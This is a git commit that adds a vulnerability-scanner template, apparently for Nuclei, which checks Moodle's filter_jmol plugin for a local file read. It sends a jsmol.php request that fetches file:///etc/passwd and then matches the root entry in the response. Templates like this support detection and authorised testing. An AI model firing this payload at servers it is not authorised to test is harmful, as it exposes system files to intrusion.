Create Moodle filter_jmol multiple vulnerabilities.yaml

2020-04-08 18:17:16 +05:30 · 2020-04-08 18:17:16 +05:30 · f5eddff072
parent be72ce2889
commit f5eddff072
1 changed files with 19 additions and 0 deletions
--- a/vulnerabilities/Moodle
+++ b/vulnerabilities/Moodle
@ -0,0 +1,19 @@
+id: Moodle filter_jmol multiple vulnerabilities
+
+info:
+  name: Moodle filter_jmol multiple vulnerabilities
+  author: madrobot
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd"
+    matchers:
+      - type: status
+        status:
+            - 200
+      - type: regex
+        regex:
+            - "root:[x*]:0:0:"
+        part: body